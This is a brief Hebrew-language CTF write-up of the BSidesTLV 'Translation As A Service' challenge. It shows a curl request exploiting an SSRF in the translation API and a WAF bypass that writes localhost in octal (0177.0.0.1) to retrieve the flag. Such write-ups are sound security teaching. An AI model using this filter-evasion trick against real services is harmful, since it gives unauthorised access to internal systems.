Translation As A Service

תיאור

Pacman

פתרון

האתר הציג שירות תרגום מאנגלית לספרדית:

ניסינו קלטים שונים, ולבסוף התברר שאם מכניסים כתובת אינטרנט, מקבלים את התוכן שלו. כלומר, האתר פגיע ל-SSRF.

ניסינו להתחבר ל-localhost וקיבלנו את התשובה הבאה:

root@kali:/media/sf_CTFs/bsidestlv/Translation_As_A_Service# curl http://translate.challenges.bsidestlv.com/api/translate?text=http://localhost
{"status":400,"content":"\n    <html>\n    <body>\n        <h1>Our SuperWAF has detected suspicous behaviour...<\/h1>\n    <\/body>\n    <\/html>\n    "}

האתר חסם את הגישה. אולם, ישנן אינספור דרכים להתייחס ל-localhost. לאחר מספר נסיונות, התברר שהאתר לא מזהה את הניסוח http://0177.0.0.1/, מה שנתן לנו את הדגל:

{"status":200,"content":"\n    <html>\n        <body>\n        <h1>Congratz!!!<\/h1>\n        <p>BSidesTLV{S$RF-1N-TR4NSLAT3-!Z-S0-KEWL!}<\/p>\n        <\/body>\n    <\/html>\n    "}